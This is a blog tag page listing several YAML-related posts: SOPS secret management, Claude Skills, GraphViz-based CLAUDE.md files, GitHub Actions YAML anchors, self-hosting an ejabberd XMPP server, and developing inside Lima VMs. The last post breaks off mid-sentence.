Posts in Yaml (19 found)
codedge 3 weeks ago

Managing secrets with SOPS in your homelab

Sealed Secrets, Ansible Vault, 1Password or SOPS - there are multiple ways how and where to store your secrets. I went with SOPS and age with my ArgoCD GitOps environment. Managing secrets in your homelab, be it within a Kubernetes cluster or while deploying systems and tooling with Ansible, is a topic that arises with almost 100% certainty. In general you need to decide, whether you want secrets to be held and managed externally or internally. One important advantage I see with internally managed solutions is, that I do not need an extra service. No extra costs and connections, no chicken-egg-problem when hosting your passwords inside your own Kubernetes cluster, but cannot reach it when the cluster is down. Therefore I went with SOPS for both, secrets for my Ansible scripts and secrets I need to set for my K8s cluster. While SOPS can be used with PGP, GnuPG and more, I settled with age as encryption. With SOPS your secrets live, encrypted, inside your repository and can be en-/decrypted on-the-fly whenever needed. The private key for encryption should, of course, never be committed into your git repository or made available to untrusted sources. First, we need to install SOPS, age and generate an age key. SOPS is available for all common operating systems via the package manager. I either use Mac or Arch: Now we need to generate an age key and link it to SOPS as the default key to encrypt with. Generate an age key Our age key will live in . Now we tell SOPS where to find our age key. I put the next line in my . The last thing to do is to put a in your folder from where you want to encrypt your files. This file acts as a configuration regarding the age recipient (key) and how the data should be encrypted. My config file looks like this: You might wonder yourself about the first rule with . I will just quote the [KSOPS docs](To make encrypted secrets more readable, we suggest using the following encryption regex to only encrypt data and stringData values. This leaves non-sensitive fields, like the secret’s name, unencrypted and human readable.) here: To make encrypted secrets more readable, we suggest using the following encryption regex to only encrypt data and stringData values. This leaves non-sensitive fields, like the secret’s name, unencrypted and human readable. All the configuration can be found in the SOPS docs . Let’s now look into the specifics using our new setup with either Ansible or Kubernetes. Ansible can automatically process (decrypt) SOPS-encrypted files with the [Community SOPS Collection](Community SOPS Collection). Additionally in my I enabled this plugin ( see docs ) via Now, taken from the official Ansible docs: After the plugin is enabled, correctly named group and host vars files will be transparently decrypted with SOPS. The files must end with one of these extensions: .sops.yaml .sops.yml .sops.json That’s it. You can now encrypt your group or host vars files and Ansible can automatically decrypt them. SOPS can be used with Kubernetes with the KSOPS Kustomize Plugin . The configuration we already prepared, we only need to apply KSOPS to our cluster. I use the following manifest - see more examples in my homelab repository : Externally managed: this includes either a self-hosted and externally hosted secrets solution like AWS KMS, password manager like 1Password or similar Internally managed: solutions where your secrets live next to your code, no external service is need Arch Linux: Two separate rules depending on the folder, where the encrypted files are located Files ending with are targeted The age key, that should be used for en-/decryption is specified

0 views
Kaushik Gopal 1 months ago

Claude Skills: What's the Deal?

Anthropic announced Claude Skills and my first reaction was: “So what?” We already have , slash commands, nested instructions, or even MCPs. What’s new here? But if Simon W thinks this is a big deal , then pelicans be damned; I must be missing something. So I dissected every word of Anthropic’s eng. blog post to find what I missed. I don’t think the innovation is what Skills does or achieves, but rather how it does it that’s super interesting. This continues their push on context engineering as the next frontier. Skills are simple markdown files with YAML frontmatter. But what makes them different is the idea of progressive disclosure : Progressive disclosure is the core design principle that makes Agent Skills flexible and scalable. Like a well-organized manual that starts with a table of contents, then specific chapters, and finally a detailed appendix, skills let Claude load information only as needed: So here’s how it works: This dynamic context loading mechanism is very token efficient ; that’s the interesting development here. In this token-starved AI economy, that’s 🤑. Other solutions aren’t as good in this specific way. Why not throw everything into ? You could add all the info directly and agents would load it at session start. The problem: loading everything fills up your context window fast, and your model starts outputting garbage unless you adopt other strategies. Not scalable. Place an AGENTS.md in each subfolder and agents read the nearest file in the tree. This splits context across folders and solves token bloat. But it’s not portable across directories and creates an override behavior instead of true composition. Place instructions in separate files and reference them in AGENTS.md. This fixes the portability problem vs the nested approach. But when referenced, the full content still loads statically. Feels closest to Skills, but lacks the JIT loading mechanism. Slash commands (or in Codex) let you provide organized, hyper-specific instructions to the LLM. You can even script sequences of actions, just like Skills. The problem: these aren’t auto-discovered. You must manually invoke them, which breaks agent autonomy. Skills handle 80% of MCP use cases with 10% of the complexity. You don’t need a network protocol if you can drop a markdown file that says “to access GitHub API, use with .” To be quite honest, I’ve never been a big fan of MCPs. I think they make a lot of sense for the inter-service communication but more often than not they’re overkill. Token-efficient context loading is the innovation. Everything else you can already do with existing tools. If this gets adoption, it could replace slash commands and simplify MCP use cases. I keep forgetting, this is for the Claude product generally (not just Claude Code) which is cool. Skills is starting to solve the larger problem: “How do I give my agent deep expertise without paying the full context cost upfront?” That’s an architectural improvement definitely worth solving and Skills looks like a good attempt. Scan at startup : Claude scans available Skills and reads only their YAML descriptions (name, summary, when to use) Build lightweight index : This creates a catalog of capabilities (with minimal token cost); so think dozens of tokens per skill Load on demand : The full content of a Skill only gets injected into context when Claude’s reasoning determines it’s relevant to the current task ✓ Auto-discovered and loaded ✗ Static: all context loaded upfront (bloats context window at scale) ✓ Scoped to directories ✗ Not portable across folders; overrides behavior, not composition ✓ Organized and modular ✗ Still requires static loading when referenced ✓ Powerful and procedural ✗ Manual invocation breaks agent autonomy ✓ Access to external data sources ✗ Heavyweight; vendor lock-in; overkill for procedural knowledge Token-efficient context loading is the innovation. Everything else you can already do with existing tools. If this gets adoption, it could replace slash commands and simplify MCP use cases. I keep forgetting, this is for the Claude product generally (not just Claude Code) which is cool.

0 views
Simon Willison 1 months ago

Claude Skills are awesome, maybe a bigger deal than MCP

Anthropic this morning introduced Claude Skills , a new pattern for making new abilities available to their models: Claude can now use Skills to improve how it performs specific tasks. Skills are folders that include instructions, scripts, and resources that Claude can load when needed. Claude will only access a skill when it's relevant to the task at hand. When used, skills make Claude better at specialized tasks like working with Excel or following your organization's brand guidelines. Their engineering blog has a more detailed explanation . There's also a new anthropic/skills GitHub repo. (I inadvertently preempted their announcement of this feature when I reverse engineered and wrote about it last Friday !) Skills are conceptually extremely simple: a skill is a Markdown file telling the model how to do something, optionally accompanied by extra documents and pre-written scripts that the model can run to help it accomplish the tasks described by the skill. Claude's new document creation abilities , which accompanied their new code interpreter feature in September, turned out to be entirely implemented using skills. Those are now available Anthropic's repo covering , , , and files. There's one extra detail that makes this a feature, not just a bunch of files in disk. At the start of a session Claude's various harnesses can scan all available skill files and read a short explanation for each one from the frontmatter YAML in the Markdown file. This is very token efficient: each skill only takes up a few dozen extra tokens, with the full details only loaded in should the user request a task that the skill can help solve. Here's that metadata for an example slack-gif-creator skill that Anthropic published this morning: Toolkit for creating animated GIFs optimized for Slack, with validators for size constraints and composable animation primitives. This skill applies when users request animated GIFs or emoji animations for Slack from descriptions like "make me a GIF for Slack of X doing Y". I just tried this skill out in the Claude mobile web app, against Sonnet 4.5. First I enabled the slack-gif-creator skill in the settings , then I prompted: And Claude made me this GIF . Click to play (it's almost epilepsy inducing, hence the click-to-play mechanism): OK, this particular GIF is terrible, but the great thing about skills is that they're very easy to iterate on to make them better. Here are some noteworthy snippets from the Python script it wrote , comments mine: This is pretty neat. Slack GIFs need to be a maximum of 2MB, so the skill includes a validation function which the model can use to check the file size. If it's too large the model can have another go at making it smaller. The skills mechanism is entirely dependent on the model having access to a filesystem, tools to navigate it and the ability to execute commands in that environment. This is a common pattern for LLM tooling these days - ChatGPT Code Interpreter was the first big example of this back in early 2023 , and the pattern later extended to local machines via coding agent tools such as Cursor, Claude Code, Codex CLI and Gemini CLI. This requirement is the biggest difference between skills and other previous attempts at expanding the abilities of LLMs, such as MCP and ChatGPT Plugins . It's a significant dependency, but it's somewhat bewildering how much new capability it unlocks. The fact that skills are so powerful and simple to create is yet another argument in favor of making safe coding environments available to LLMs. The word safe there is doing a lot of work though! We really need to figure out how best to sandbox these environments such that attacks such as prompt injections are limited to an acceptable amount of damage. Back in January I made some foolhardy predictions about AI/LLMs , including that "agents" would once again fail to happen: I think we are going to see a lot more froth about agents in 2025, but I expect the results will be a great disappointment to most of the people who are excited about this term. I expect a lot of money will be lost chasing after several different poorly defined dreams that share that name. I was entirely wrong about that. 2025 really has been the year of "agents", no matter which of the many conflicting definitions you decide to use (I eventually settled on " tools in a loop "). Claude Code is, with hindsight, poorly named. It's not purely a coding tool: it's a tool for general computer automation. Anything you can achieve by typing commands into a computer is something that can now be automated by Claude Code. It's best described as a general agent . Skills make this a whole lot more obvious and explicit. I find the potential applications of this trick somewhat dizzying. Just thinking about this with my data journalism hat on: imagine a folder full of skills that covers tasks like the following: Congratulations, you just built a "data journalism agent" that can discover and help publish stories against fresh drops of US census data. And you did it with a folder full of Markdown files and maybe a couple of example Python scripts. Model Context Protocol has attracted an enormous amount of buzz since its initial release back in November last year . I like to joke that one of the reasons it took off is that every company knew they needed an "AI strategy", and building (or announcing) an MCP implementation was an easy way to tick that box. Over time the limitations of MCP have started to emerge. The most significant is in terms of token usage: GitHub's official MCP on its own famously consumes tens of thousands of tokens of context, and once you've added a few more to that there's precious little space left for the LLM to actually do useful work. My own interest in MCPs has waned ever since I started taking coding agents seriously. Almost everything I might achieve with an MCP can be handled by a CLI tool instead. LLMs know how to call , which means you don't have to spend many tokens describing how to use them - the model can figure it out later when it needs to. Skills have exactly the same advantage, only now I don't even need to implement a new CLI tool. I can drop a Markdown file in describing how to do a task instead, adding extra scripts only if they'll help make things more reliable or efficient. One of the most exciting things about Skills is how easy they are to share. I expect many skills will be implemented as a single file - more sophisticated ones will be a folder with a few more. Anthropic have Agent Skills documentation and a Claude Skills Cookbook . I'm already thinking through ideas of skills I might build myself, like one on how to build Datasette plugins . Something else I love about the design of skills is there is nothing at all preventing them from being used with other models. You can grab a skills folder right now, point Codex CLI or Gemini CLI at it and say "read pdf/SKILL.md and then create me a PDF describing this project" and it will work, despite those tools and models having no baked in knowledge of the skills system. I expect we'll see a Cambrian explosion in Skills which will make this year's MCP rush look pedestrian by comparison. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . Trying out the slack-gif-creator skill Skills depend on a coding environment Claude as a General Agent Skills compared to MCP Here come the Skills Where to get US census data from and how to understand its structure How to load data from different formats into SQLite or DuckDB using appropriate Python libraries How to publish data online, as Parquet files in S3 or pushed as tables to Datasette Cloud A skill defined by an experienced data reporter talking about how best to find the interesting stories in a new set of data A skill that describes how to build clean, readable data visualizations using D3

0 views

Using GraphViz for CLAUDE.md

This is a very, very informal interim research report about something I've been playing with over the past couple days. Last Friday, I saw an absolutely astonishing extemporaneous talk by an organization that is so far down the curve of AI maximalist development that it kind of broke my brain. I'm hoping to write more about a bunch of what I saw in the coming weeks, but I'm very much still digesting what I saw. One of the things that I thought they said during the talk was that they were using .dot (GraphViz) as the language that they are using as the formalization for new processes for their coding agent. It made sense to me. There's enough dot on the Internet that models can read and understand it quite well. And it removes a whole bunch of the ambiguity of English language specifications. It turns out that I completely misunderstood what was going on, in the best possible way. They're using GraphViz, but not for that. They're using Markdown files to allow the agent to document new processes and capabilities for itself. That makes tons of sense. It's roughly the same format that Anthropic is using for Claude's new 'SKILL.md' files, which are just Markdown files with YAML frontmatter. But before I was corrected, I went home and started experimenting. And... I'm kind of excited about what I ended up with. The first thing I did was that I asked Claude to convert my CLAUDE.md into GraphViz. It worked pretty well because most of my CLAUDE.md was process documentation. The first iterations (which didn't get saved) were somewhat unhinged. My processes were inconsistent and doing this work made the problems very, very obvious. Over the course of a couple hours, Claude and I iterated on my processes and on how to use dot as specification language. There was only one absolute disaster of a hallucination when I asked Claude to update the process with what would be "100x better" and it threw in a whole bunch of Science Fiction features...that will still probably be Science Fiction 6 months from now. After about a dozen rounds of iteration, we workshopped my processes to the point where they mostly seemed to flow correctly AND the .dot document was really readable by both of us. And then I swapped it in place of my CLAUDE.md and fired up a session and...Claude behaved normally and understood my rules. I ran a couple of vibechecks, asking it for the same small project with both the traditional rules and the .dot rules. It was a very unscientific test, but I found the .dot version of Claude and its output preferable. At least in these early tests, Claude seems better at understanding and following rules written as dot. And the format makes it much easier to visualize many situations when you're giving your robot buddy rules it can't follow. We also put together a .dot styleguide to eventually let Claude more easily write its own processes. I haven't yet had a ton of experience with CLAUDE self-documenting new processes, but that's coming. (As an aside, I also have another mini-project running that's extracting learnings and memories from all my previous Claude Code sessions. But that's a story for another day. Until then, you can find it on GitHub at https://github.com/obra/claude-memory-extractor) This was my most recent CLAUDE.md before this project: This is my current CLAUDE dot md: What follows is a mini-writeup written by Claude (Opus 4.1). I made the mistake of asking it to write in my voice, but make no mistake - all the words after this point are generated. They don't tell a good story about my motivations, but the narrative does a decent job explaining the investigation process. I've been working with Claude for a while now, and I have a detailed CLAUDE.md file that contains all my rules and preferences. It's great, but it's also... a wall of text. Rules like "NEVER use git add -A" and "You're absolutely right!" is forbidden are scattered throughout. When Claude needs to follow a complex process, it's not always clear what the actual flow should be. So I had an idea: what if we could use Graphviz's dot language as a DSL for documenting processes? Not for pretty diagrams (though that's a nice side effect), but as a structured, searchable, executable process definition language that Claude can actually read and follow. First attempt - just document everything that's already in CLAUDE.md as a massive flowchart: This was... overwhelming. Too many boxes, too many connections, and honestly, Claude would never be able to follow this. It looked comprehensive but wasn't actually useful. I realized Rule #1 ("Break any rule? Stop and ask Jesse") shouldn't be a separate entry point but should be embedded throughout: Better, but still treating processes as these separate phases that don't really reflect how work actually happens. Tried to create a more unified workflow: This was starting to look more realistic, but still too academic. The "continuous processes" box was a particular cop-out - those aren't separate activities, they happen during the work. Tried to boil it down to the essence: Cleaner, but now we'd lost important detail. Also those emoji warnings didn't render properly - turns out Graphviz doesn't love Unicode. Got ambitious and created two versions - one documenting current processes, one imagining what would make Claude "superhuman": This was incredibly detailed - 7 layers of process! But when I asked myself "could Claude actually follow this?" the answer was no. Too complex. This was fantasy. Things like "confidence percentages" and "cognitive load monitoring" - Claude can't actually do these. I was designing capabilities that don't exist. Converted the "superhuman" version into things Claude could actually do: Better! Actionable steps like "Write down what's not working" instead of "Monitor cognitive load." But the task classification at the start was artificial - Claude doesn't actually know if something will take 30 minutes. Time to get real about what actually happens: This version admitted the truth: Claude often jumps into coding too quickly, forgets to search for similar code, and has specific danger zones where it fails. Much more useful! Tried organizing as a proper framework: But then I realized - these aren't really "phases." Work doesn't happen in phases, it's all interconnected with loops and branches. Getting closer to reality: This showed the actual flow better, but was still hard for Claude to parse from the dot file itself. Then came the key insight: Claude doesn't need one giant flowchart. It needs to be able to jump to the right process based on the current situation. Enter trigger-based design: Now each cluster is a self-contained process that starts with a clear trigger. Claude can search for "stuck" and find the "When Stuck" process. Much better! Then I learned you can use quoted strings as node identifiers in dot: Instead of: This transformed everything! The final readable version: Now the dot file itself is readable documentation. Claude can parse it directly without mental translation. Removed all labels and used semantic naming: With good naming, the labels are completely redundant. The diagram is cleaner and the source is more maintainable. We even created processes for maintaining the processes: The key insight: processes come from experience, not planning. Either Jesse teaches me something, I discover a pattern through repetition, or I hit a gap in existing processes. To make this systematic, we created a style guide - also written in dot! The style guide defines: Applying all these lessons: This version: Using Graphviz dot notation as a process DSL is actually brilliant because: Instead of one massive flowchart, having separate processes with clear triggers is much more useful: Using quoted strings and meaningful names makes the dot files themselves readable: Is so much clearer than: Using different shapes systematically helps Claude understand what type of thing each node is: The most useful version wasn't the most comprehensive one. It was the one that: Instead of one giant file, we could have a process library in : Each file would be a focused, trigger-based process that Claude could load when needed. We could even hook this into the slash command system - imagine loading and displaying the relevant process. What started as an attempt to visualize CLAUDE.md turned into discovering that Graphviz's dot language is actually a fantastic DSL for defining executable processes. The key wasn't making prettier diagrams - it was realizing that the text representation itself could be the documentation. The final version is something Claude can actually read, understand, and follow. It's not perfect, but it's honest about how Claude actually works and where it tends to fail. And that honesty makes it genuinely useful. Most importantly, this isn't just documentation - it's a living process definition that can evolve as we discover new patterns and better ways of working. Every time Jesse teaches me something new or I discover a pattern that works, it can become a new process in the library. The real magic is that we're using a graph description language for what it was meant for - describing flows and relationships - but in a way that's both human-readable and machine-parseable. That's the sweet spot for AI assistance tools. Different node shapes for different purposes (diamonds for decisions, octagons for warnings, etc.) Naming conventions for clarity When to add new processes How to test if a process is useful Uses semantic node shapes (plaintext for commands, diamonds for decisions, octagons for warnings) Has clear trigger points for each process Is readable both as a diagram and as source code Actually represents how Claude works, not how we wish it worked It's visual when you need it to be It's searchable text when Claude needs to find something It enforces structure (nodes and edges) It's version controllable It renders nicely for documentation "When stuck" -> go to stuck process "Test failing" -> go to debug process "New request" -> go to request process for decisions for literal commands to run for critical warnings Admitted where Claude actually fails Included only processes that actually get used Used simple, clear language Could be followed mechanically

0 views
ENOSUCHBLOG 2 months ago

Dear GitHub: no YAML anchors, please

TL;DR : for a very long time, GitHub Actions lacked support for YAML anchors. This was a good thing . YAML anchors in GitHub Actions are (1) redundant with existing functionality, (2) introduce a complication to the data model that makes CI/CD human and machine comprehension harder, and (3) are not even uniquely useful because GitHub has chosen not to support the one feature (merge keys) that lacks a semantic equivalent in GitHub Actions. For these reasons, YAML anchors are a step backwards that reinforces GitHub Actions’ status as an insecure by default CI/CD platform. GitHub should immediately remove support for YAML anchors, before adoption becomes widespread. GitHub recently announced that YAML anchors are now supported in GitHub Actions. That means that users can write things like this: On face value, this seems like a reasonable feature: the job and step abstractions in GitHub Actions lend themselves to duplication, and YAML anchors are one way to reduce that duplication. Unfortunately, YAML anchors are a terrible tool for this job. Furthermore (as we’ll see) GitHub’s implementation of YAML anchors is incomplete , precluding the actual small subset of use cases where YAML anchors are uniquely useful (but still not a good idea). We’ll see why below. Pictured: the author’s understanding of the GitHub Actions product roadmap. The simplest reason why YAML anchors are a bad idea is because they’re redundant with other more explicit mechanisms for reducing duplication in GitHub Actions. GitHub’s own example above could be rewritten without YAML anchors as: This version is significantly clearer, but has slightly different semantics: all jobs inherit the workflow-level . But this, in my opinion, is a good thing : the need to template environment variables across a subset of jobs suggests an architectural error in the workflow design. In other words: if you find yourself wanting to use YAML anchors to share “global” configuration between jobs or steps, you probably actually want separate workflows, or at least separate jobs with job-level blocks. In summary: YAML anchors further muddy the abstractions of workflows, jobs, and steps, by introducing a cross-cutting form of global state that doesn’t play by the rules of the rest of the system. This, to me, suggests that the current Actions team lacks a strong set of opinions about how GitHub Actions should be used, leading to a “kitchen sink” approach that serves all users equally poorly. As noted above: YAML anchors introduce a new form of non-locality into GitHub Actions. Furthermore, this form of non-locality is fully general : any YAML node can be anchored and referenced. This is a bad idea for humans and machines alike: For humans: a new form of non-locality makes it harder to preserve local understanding of what a workflow, job, or step does: a unit of work may now depend on any other unit of work in the same file, including one hundreds or thousands of lines away. This makes it harder to reason about the behavior of one’s GitHub Actions without context switching. It would only be fair to note that GitHub Actions already has some forms of non-locality: global contexts, scoping rules for blocks, dependencies, step and job outputs, and so on. These can be difficult to debug! But what sets them apart is their lack of generality : each has precise semantics and scoping rules, meaning that a user who understands those rules can comprehend what a unit of work does without referencing the source of an environment variable, output, &c. For machines: non-locality makes it significantly harder to write tools that analyze (or transform) GitHub Actions workflows. The pain here boils down to the fact that YAML anchors diverge from the one-to-one object model 1 that GitHub Actions otherwise maps onto. With anchors, that mapping becomes one-to-many: the same element may appear once in the source, but multiple times in the loaded object representation. In effect, this breaks a critical assumption that many tools make about YAML in GitHub Actions: that an entity in the deserialized object can be mapped back to a single concrete location in the source YAML. This is needed to present reasonable source locations in error messages, but it doesn’t hold if the object model doesn’t represent anchors and references explicitly. Furthermore, this is the reality for every YAML parser in wide use: all widespread YAML parsers choose (reasonably) to copy anchored values into each location where they’re referenced, meaning that the analyzing tool cannot “see” the original element for source location purposes. I feel these pains directly: I maintain zizmor as a static analysis tool for GitHub Actions, and makes both of these assumptions. Moreover, ’s dependencies make these assumptions: (like most other YAML parsers) chooses to deserialize YAML anchors by copying the anchored value into each location where it’s referenced 2 . One of the few things that make YAML anchors uniquely useful is merge keys : a merge key allows a user to compose multiple referenced mappings together into a single mapping. An example from the YAML spec, which I think tidily demonstrates both their use case and how incredibly confusing merge keys are: I personally find this syntax incredibly hard to read, but at least it has a unique use case that could be useful in GitHub Actions: composing multiple sets of environment variables together with clear precedence rules is manifestly useful. Except: GitHub Actions doesn’t support merge keys ! They appear to be using their own internal YAML parser that already had some degree of support for anchors and references, but not for merge keys. To me, this takes the situation from a set of bad technical decisions (and lack of strong opinions around how GitHub Actions should be used) to farce : the one thing that makes YAML anchors uniquely useful in the context of GitHub Actions is the one thing that GitHub Actions doesn’t support. To summarize, I think YAML anchors in GitHub Actions are (1) redundant with existing functionality, (2) introduce a complication to the data model that makes CI/CD human and machine comprehension harder, and (3) are not even uniquely useful because GitHub has chosen not to support the one feature (merge keys) that lacks a semantic equivalent in GitHub Actions. Of these reasons, I think (2) is the most important: GitHub Actions security has been in the news   a great deal recently , with the overwhelming consensus being that it’s too easy to introduce vulnerabilities in (or expose otherwise latent vulnerabilities through ) GitHub Actions workflow. For this reason, we need GitHub Actions to be easy to analyze for humans and machine alike. In effect, this means that GitHub should be decreasing the complexity of GitHub Actions, not increasing it. YAML anchors are a step in the wrong direction for all of the reasons aforementioned. Of course, I’m not without self-interest here: I maintain a static analysis tool for GitHub Actions, and supporting YAML anchors is going to be an absolute royal pain in my ass 3 . But it’s not just me: tools like actionlint , claws , and poutine are all likely to struggle with supporting YAML anchors, as they fundamentally alter each tool’s relationship to GitHub Actions’ assumed data model. As-is, this change blows a massive hole in the larger open source ecosystem’s ability to analyze GitHub Actions for correctness and security. All told: I strongly believe that GitHub should immediately remove support for YAML anchors in GitHub Actions. The “good” news is that they can probably do so with a bare minimum of user disruption, since support has only been public for a few days and adoption is (probably) still primarily at the single-use workflow layer and not the reusable action (or workflow) layer. That object model is essentially the JSON object model, where all elements appear as literal components of their source representation and take a small subset of possible types (string, number, boolean, array, object, null).  ↩ In other words: even though YAML itself is a superset of JSON, users don’t want YAML-isms to leak through to the object model. Everybody wants the JSON object model, and that means no “anchor” or “reference” elements anywhere in a deserialized structure.  ↩ To the point where I’m not clear it’s actually worth supporting anchors to any meaningful extent, and instead immediately flagging them as an attempt at obfuscation.  ↩ For humans: a new form of non-locality makes it harder to preserve local understanding of what a workflow, job, or step does: a unit of work may now depend on any other unit of work in the same file, including one hundreds or thousands of lines away. This makes it harder to reason about the behavior of one’s GitHub Actions without context switching. It would only be fair to note that GitHub Actions already has some forms of non-locality: global contexts, scoping rules for blocks, dependencies, step and job outputs, and so on. These can be difficult to debug! But what sets them apart is their lack of generality : each has precise semantics and scoping rules, meaning that a user who understands those rules can comprehend what a unit of work does without referencing the source of an environment variable, output, &c. For machines: non-locality makes it significantly harder to write tools that analyze (or transform) GitHub Actions workflows. The pain here boils down to the fact that YAML anchors diverge from the one-to-one object model 1 that GitHub Actions otherwise maps onto. With anchors, that mapping becomes one-to-many: the same element may appear once in the source, but multiple times in the loaded object representation. In effect, this breaks a critical assumption that many tools make about YAML in GitHub Actions: that an entity in the deserialized object can be mapped back to a single concrete location in the source YAML. This is needed to present reasonable source locations in error messages, but it doesn’t hold if the object model doesn’t represent anchors and references explicitly. Furthermore, this is the reality for every YAML parser in wide use: all widespread YAML parsers choose (reasonably) to copy anchored values into each location where they’re referenced, meaning that the analyzing tool cannot “see” the original element for source location purposes. I feel these pains directly: I maintain zizmor as a static analysis tool for GitHub Actions, and makes both of these assumptions. Moreover, ’s dependencies make these assumptions: (like most other YAML parsers) chooses to deserialize YAML anchors by copying the anchored value into each location where it’s referenced 2 . That object model is essentially the JSON object model, where all elements appear as literal components of their source representation and take a small subset of possible types (string, number, boolean, array, object, null).  ↩ In other words: even though YAML itself is a superset of JSON, users don’t want YAML-isms to leak through to the object model. Everybody wants the JSON object model, and that means no “anchor” or “reference” elements anywhere in a deserialized structure.  ↩ To the point where I’m not clear it’s actually worth supporting anchors to any meaningful extent, and instead immediately flagging them as an attempt at obfuscation.  ↩

0 views
codedge 2 months ago

Modern messaging: Running your own XMPP server

Since a years we know, or might suspect, our chats are listend on, our uploaded files are sold for advertising or what purpose ever and the chance our social messengers leak our private data is incredibly high. It is about time to work against this. Since 3 years the European Commission works on a plan to automatically monitor all chat, email and messenger conversations. 1 2 If this is going to pass, and I strongly hope it will not, the European Union is moving into a direction we know from states suppressing freedom of speech. I went for setting up my own XMPP server, as this does not have any big resource requirements and still support clustering (for high-availabilty purposes), encryption via OMEMO, file sharing and has support for platforms and operating systems. Also the ecosystem with clients and multiple use cases evolved over the years to provide rock-solid software and solutions for multi-user chats or event audio and video calls. All steps and settings are bundled in a repository containing Ansible roles: https://codeberg.org/codedge/chat All code snippets written below work in either Debian os Raspberry Pi OS. The connection from your client to the XMPP server is encrypted and we need certificates for our server. First thing to do is setting up our domains and point it to the IP - both IPv4 and IPv6 is supported and we can specify both later in our configuration. I assume the server is going to be run under and you all the following domains have been set up. Fill in the IPv6 addresses accordingly. ejabberd is a robust server software, that is included in most Linux distributions. Install from Process One repository I discovered ProcessOne, the company behind ejabberd , also provides a Debian repository . Install from Github To get the most recent one, I use the packages offered in their code repository . Installing version 25.07 just download the asset from the release: Make sure the fowolling ports are opened in your firewall, taken from ejabberd firewall settings . Port , used for MQTT, is also mentioned in the ejabberd docs, but we do not use this in our setup. So this port stays closed. Depending how you installed ejabberd the config file is either at or . The configuration is a balance of 70:30 between having a privacy-focused setup for your users and meeting most of the suggestions of the XMPP complicance test . That means, settings that protect the provacy of the users are higher rated despite not passing the test. Therefore notable privacy and security settings are: The configuration file is in YAML format. Keep an eye for indentation. Let’s start digging into the configuration. Set the domain of your server Set the database type Instead of using the default type, we opt for , better said . Generate DH params Generate a fresh set of params for the DH key exchange. In your terminal run and link the new file in the ejabberd configuration. Ensure TLS for server-to-server connections Use TLS for server-to-server (s2s) connections. The listners The listeners aka inside the config especially for , , and are important. All of them listen on port . Only one request handler is attached to port , the . For adminstration of ejabberd we need a user with admin rights and properly set up ACLs and access rules. There is a separat section for ACLs inside the config in which we set up an admin user name . The name of the user is important for later, when we actually create this user. The should already be set up, just to confirm that you have a correct entry for the action. Now the new user needs to be create by running this command on the console. Watch out to put in the correct domain. Another user can be registered with the same command. We set as the admin user in the config previously. That is how ejabberd knows which user has admin permissions. Enabling file uploads is done with . First, create a folder where the uploads should be stored. Now update the ejabberd configuration like this: The allowed file upload size is defined in the param and is set to 10MB. Make sure, to delete uploaded files in a reasonable amount of time via cronjob. This is an example of a cronjob, that deletes files that are older than 1 week. Registration in ejabberd is done via and can be enabled with these entries in the config file: If you want to enable registration for your server make sure you enable a captcha for it. Otherwise you will get a lot of spam and fake registrations. ejabberd provides a working captcha script , that you can copy to your server and link in your configuration. You will need and installed on you system. In the config file ejabberd can provision TLS certificates on its own. No need to install certbot . To not expose ejabberd directly to the internet, is put in front of the XMPP server. Instead of using nginx , every other web server (caddy, …) or proxy can be used as well. Here is a sample config for nginx : The nginx vhosts offers files, and , for indicating which other connection methods (BOSH, WS) your server offers. The details can be read in XEP-0156 extension. Opposite to the examples in the XEP, there is no BOSH, but only a websocket connection our server offers. The BOSH part is removed from the config file. host-meta.json Put that file in a folder your nginx serves. Have a look at the path and URL it is expected to be, see . Clients I can recommend are Profanity , an easy to use command-line client, and Monal for MacOS and iOS. A good overview of client can be found on the offical XMPP website . Citizen-led initiative collecting information about Chat Controle https://fightchatcontrol.eu   ↩︎ Explanation by Patrick Breyer, former member of the European Parliament https://www.patrick-breyer.de/en/posts/chat-control/   ↩︎ 5222 : Jabber/XMPP client connections, plain or STARTTLS 5223 : Jabber client connections, using the old SSL method 5269 : Jabber/XMPP incoming server connections 5280/5443 : HTTP/HTTPS for Web Admin and many more 7777 : SOCKS5 file transfer proxy 3478/5349 : STUN+TURN/STUNS+TURNS service XMPP over HTTP is disabled ( mod_bosh ) Discover then a user last accessed a server is disabled ( mod_last ) Delete uploaded files on a regular base (see upload config ) Register account via a web page is disabled ( mod_register_web ) In-band registration can be enabled, default off, captcha secured ( mod_register , see registration config ) Citizen-led initiative collecting information about Chat Controle https://fightchatcontrol.eu   ↩︎ Explanation by Patrick Breyer, former member of the European Parliament https://www.patrick-breyer.de/en/posts/chat-control/   ↩︎

0 views
crtns 2 months ago

Why I Moved Development to VMs

I've had it with supply chain attacks. The recent inclusion of malware into the package was the last straw for me. Malware being distributed in hijacked packages isn't a new phenomenon, but this was an attack specifically targeting developers. It publicly dumped user secrets to GitHub and exposed private GitHub repos publicly. I would have been a victim of this malware if I had not gotten lucky. I develop personal projects in Typescript. I've used . Sensitive credentials are stored in my environment variables and configs. Personal documents live in my home directory. And I run untrusted code in that same environment, giving any malware full access to all my data. First, the attackers utilized a misconfigured GitHub Action in the repo using a common attack pattern, the trigger. The target repo's is available to the source repo's code in the pull request when using this trigger, which in the wrong case can be used to read and exfiltrate secrets, just as it was in this incident. 💭 This trigger type is currently insecure by default . The GitHub documentation contains a warning about properly configuring permissions before using , but when security rests on developers reading a warning in your docs, you probably have a design flaw that documentation won't fix. Second, they leveraged script injection. The workflow in question interpolated the PR title directly in a script step without parsing or validating the input beforehand. A malicious PR triggered an inline execution of a modified script that sent a sensitive NPM token to the attacker. 💭 Combining shell scripts with templating is a GitHub Action feature that is insecure by design . There is a reason why the GitHub documentation is full of warnings about script injection . A more secure system would require explicit eval of all inputs instead of direct interpolation of inputs into code. I'm moving to development in VMs to provide stronger isolation between my development environments and my host machine. Lima has become my tool of choice for creating and managing these virtual machines. It comes with a clean CLI as its primary interface, and a simple YAML based configuration file that can be used to customize each VM instance. Despite having many years of experience using Vagrant and containers, I chose Lima instead. From a security perspective, the way Vagrant boxes are created and distributed is a problem for me. The provenance of these images is not clear once they're uploaded to Vagrant Cloud. To prove my point, I created and now own the and Vagrant registries. To my knowledge, there's no way to verify the true ownership of any registries in Vagrant Cloud. Lima directly uses the cloud images published by each Linux distribution. Here's a snippet of the Fedora 42 template . Not perfect, but more trustworthy. I also considered Devcontainers, but I prefer the VM solution for a few reasons. While containers are great for consistent team environments or application deploys, I like the stronger isolation boundary that VMs provide. Container escapes and kernel exploits are a class of vulnerability that VMs can mitigate and containers do not. Finally, the Devcontainer spec introduces complexity I don't want to manage for personal project development. I want to treat my dev environment like a persistent desktop where I can install tools without editing 